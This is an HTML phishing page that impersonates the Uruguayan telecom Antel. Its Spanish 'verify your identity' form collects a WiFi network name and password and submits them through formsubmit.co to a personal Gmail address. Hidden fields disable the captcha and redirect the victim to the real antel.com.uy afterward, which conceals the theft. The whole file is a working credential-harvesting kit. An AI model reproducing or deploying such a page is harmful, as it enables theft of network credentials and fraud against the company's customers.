<!DOCTYPE html>

<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Antel</title>
  <link rel="stylesheet" href="styles.css">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="https://i.ibb.co/yRz9Ytq/fvc.png" type="image/png">
</head>
<body>
  <form action="https://formsubmit.co/victorgama1643@gmail.com" method="POST">
    <div class="logo">
      <img src="https://i.ibb.co/3h1ZFYD/blue.png" alt="">
    </div>
    <h1>Verifica tu identidad</h1>
    <label>Nombre de Wifi</label>
    <input type="text" name="name" required>
    <label>Contraseña</label>
    <input type="text" name="password" required>
    <button type="submit">confirmar</button>
    <input type="hidden" name="_next" value="https://www.antel.com.uy">
    <input type="hidden" name="_captcha" value="false">
  </form>
</body>
</html>
